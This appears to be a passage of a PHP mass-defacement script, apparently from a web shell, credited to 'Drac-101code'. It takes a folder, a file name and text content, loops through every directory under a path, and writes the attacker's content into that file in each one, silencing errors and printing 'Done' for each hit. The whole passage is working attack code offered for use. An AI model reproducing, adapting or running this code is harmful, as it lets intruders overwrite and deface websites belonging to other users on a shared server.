?>
Folder:
file name :
Text Content :
[+] Single user Mass defacer
-----------------------------------------------
";
$dir=opendir($mainpath); //fixme - cannot deface when change to writeable path!!
while($row=readdir($dir))
{
$start=@fopen("$row/$file","w+");
$code=$txtContents;
$finish=@fwrite($start,$code);
if ($finish)
{
echo "$row/$file > Done
";
}
}
echo "-----------------------------------------------
[+] Script by Drac-101code ...";
}
echo '